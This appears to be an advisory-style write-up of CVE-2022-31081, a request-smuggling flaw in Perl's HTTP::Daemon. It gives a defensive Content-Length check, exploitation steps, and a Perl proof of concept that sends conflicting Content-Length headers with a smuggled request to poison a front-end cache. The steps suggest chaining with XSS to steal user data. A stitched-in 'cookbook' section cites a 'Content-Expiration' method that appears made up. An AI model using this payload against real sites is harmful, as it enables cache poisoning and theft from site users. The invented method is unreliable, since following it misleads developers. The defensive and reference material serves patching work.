The most common form of exploitation is to poison the cache of a target site. HTTP::Daemon (before 6.15) does not sufficiently validate the `Content-Length` header of incoming requests: a value that is not a single non-negative integer, or multiple conflicting `Content-Length` headers, is accepted instead of being rejected. When such a daemon runs behind a caching front-end or reverse proxy, the two components can disagree about where a request body ends, and an attacker can exploit that disagreement to smuggle an extra request to the HTTP daemon server and have its response cached for an unrelated URL. The result is a poisoned cache and, in the worst case, a denial of service for the pages of the target site that depend on `HTTP::Daemon`. For example, a target site might serve pages with a daemon like this:

```perl
# Pages served through a caching front-end that forwards to this daemon
# are the ones at risk of being poisoned.
use HTTP::Daemon;

my $daemon = HTTP::Daemon->new(
    LocalAddr => '127.0.0.1',
    LocalPort => 8080,
) or die "Cannot listen: $!";

while (my $conn = $daemon->accept) {
    my $rqst = $conn->get_request;   # returns an HTTP::Request object
}
```

Inspecting the returned `HTTP::Request` object by querying the header (`my $cl = $rqst->header('Content-Length')`) will show any abnormalities, and these should be dealt with by a `400` response. Expected strings of `Content-Length` SHOULD consist of a single non-negative integer, or a comma-separated repetition of that same integer; anything else should be answered with:
==> 400 - Bad Request
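As a rough sketch of that check (this is not the upstream 6.15 patch), a handler could validate the header before trusting it, reusing `$conn` and `$rqst` from the listener above:

```perl
# Reject a request whose Content-Length is not a single non-negative
# integer or an identical repetition of one. In scalar context,
# header() joins multiple Content-Length values with ", ".
my $cl = $rqst->header('Content-Length');
if (defined $cl) {
    my @values   = split /\s*,\s*/, $cl;
    my %distinct = map { $_ => 1 } @values;
    if (grep { !/^\d+$/ } @values or keys %distinct > 1) {
        $conn->send_error(400, 'Bad Content-Length');   # 400 - Bad Request
        $conn->close;
    }
}
```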
HTTP::Daemon cookbook
The HTTP::Daemon cookbook lists methods that help ensure your daemon behaves correctly. Check this list before implementing any new features; it is a good way to add sanity checks before you deploy changes.
If you're looking to implement a feature like content expiration, take a look at the `Content-Expiration` method first. To use it, you need to know what types of content your daemon handles in the first place: an expiration policy written for HTML documents will not carry over to other types of content, such as PDF documents or image files, served by the same HTTP daemon server.
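If you do add expiration, a minimal sketch might key lifetimes on the content type and set an `Expires` header on each response; the `%lifetime` map, the helper name `respond_with_expiry`, and the chosen lifetimes below are assumptions for illustration rather than part of HTTP::Daemon:

```perl
# Hypothetical per-content-type expiration; $conn is a connection
# accepted by the listener shown earlier.
use HTTP::Response;
use HTTP::Date qw(time2str);

my %lifetime = (
    'text/html'       => 60,        # revalidate HTML quickly
    'application/pdf' => 86_400,    # cache PDFs for a day
    'image/png'       => 604_800,   # cache images for a week
);

sub respond_with_expiry {
    my ($conn, $type, $body) = @_;
    my $resp = HTTP::Response->new(200, 'OK', [
        'Content-Type' => $type,
        'Expires'      => time2str(time + ($lifetime{$type} // 0)),
    ], $body);
    $conn->send_response($resp);
}
```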
Exploitation Steps:
First, the attacker must identify a target site that they wish to exploit.
Second, the attacker must craft requests whose `Content-Length` headers are malformed or conflicting, so that the caching front-end and `HTTP::Daemon` disagree about where each request body ends (see the sketch after these steps).
Third, the attacker appends a smuggled request inside the desynchronized body; `HTTP::Daemon` parses the leftover bytes as a separate request, and the front-end may cache the resulting response under an unrelated URL, poisoning the cache. A hardened daemon would instead reject such abnormalities in the incoming `HTTP::Request` with a `400` response.
Fourth, once the cache is poisoned, the attacker can chain the flaw with resources such as XSRF vulnerabilities or cross-site scripting vulnerabilities to gain access to, and potentially steal information from, users of the vulnerable target website.
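As a purely illustrative sketch of the second and third steps, the snippet below sends one request carrying two conflicting `Content-Length` headers; the host `target.example`, the path `/poisoned`, and the assumption about which value each component honours are hypothetical, not details taken from the advisory.

```perl
# Illustrative only: one request with two conflicting Content-Length
# headers. If the front-end honours the larger value while a vulnerable
# HTTP::Daemon honours the smaller one, the trailing bytes are parsed
# as a second, smuggled request whose response may then be cached.
use IO::Socket::INET;

my $sock = IO::Socket::INET->new(
    PeerAddr => 'target.example',   # hypothetical front-end of the target site
    PeerPort => 80,
    Proto    => 'tcp',
) or die "connect: $!";

my $smuggled = "GET /poisoned HTTP/1.1\r\nHost: target.example\r\n\r\n";
print $sock "POST / HTTP/1.1\r\n"
          . "Host: target.example\r\n"
          . "Content-Length: " . length($smuggled) . "\r\n"
          . "Content-Length: 0\r\n"
          . "\r\n"
          . $smuggled;
```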
Timeline
Published on: 06/27/2022 21:15:00 UTC
Last modified on: 07/08/2022 17:45:00 UTC
References
- https://github.com/libwww-perl/HTTP-Daemon/commit/e84475de51d6fd7b29354a997413472a99db70b2
- https://github.com/libwww-perl/HTTP-Daemon/commit/8dc5269d59e2d5d9eb1647d82c449ccd880f7fd0
- https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
- https://datatracker.ietf.org/doc/html/rfc7230#section-9.5
- https://github.com/libwww-perl/HTTP-Daemon/security/advisories/GHSA-cg8c-pxmv-w7cf
- http://metacpan.org/release/HTTP-Daemon/
- https://cwe.mitre.org/data/definitions/444.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31081